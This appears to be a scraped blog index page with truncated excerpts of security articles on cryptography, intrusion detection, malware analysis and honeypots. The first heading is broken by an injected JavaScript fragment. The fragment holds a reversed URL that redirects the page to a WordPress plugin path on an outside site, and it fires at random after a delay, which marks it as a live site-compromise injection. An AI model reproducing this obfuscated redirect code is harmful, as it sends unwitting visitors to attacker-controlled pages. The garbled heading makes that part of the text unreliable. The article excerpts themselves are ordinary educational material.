Author - sa

Cryptoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tography, What is it ?

Cryptography and cryptanalysis is the part of cryptology. Cryptography is the science of secret writing with the goal of hiding the meaning of a message whereas Cryptanalysis is the science or art of breaking crypto-systems.  Cryptanalysis is the only way to assure that a cryptosystem is secure and it is an integral part of cryptology. Cryptography itself branches into three main parts: Symmetric Algorithms are the most popular in cryptography in which two parties have an encryption and decryption method for which [...]

Intrusion Detection systems

An intrusion detection system (IDS) is a device or software application that monitors network or system activities for malicious activities or policy violations and produces reports to a Management Station. Some systems may attempt to stop an intrusion attempt but this is neither required nor expected of a monitoring system. Intrusion detection and prevention systems (IDPS) are primarily focused on identifying possible incidents, logging information about them, and reporting attempts. In addition, organizations use IDPSes for other purposes, such [...]

Introduction To Malware Analysis

There are many ways to study a program’s behavior. With static analysis, we study a program without actually executing it. Tools of the trade are disassemblers, decompilers, source code analyzers, and even such basic utilities as strings and grep. Static analysis has the advantage that it can reveal how a program would behave under unusual conditions, because we can examine parts of a program that normally do not execute. In real life, static analysis gives an approximate picture at [...]

No honeypot? Don’t bother calling yourself a security pro

No honeypot? Don’t bother calling yourself a security pro Deploy one of these honeypots and you’ll soon find out who’s attacking you — and devise a strong defense to fight back I’m constantly amazed by how many companies don’t bother running honeypots, despite evidence that they’re incredibly high-value, low-noise defense assets. A honeypot is a computer software or device that exists simply to be attacked. You can take any computer — typically one you’re getting ready to decommission because [...]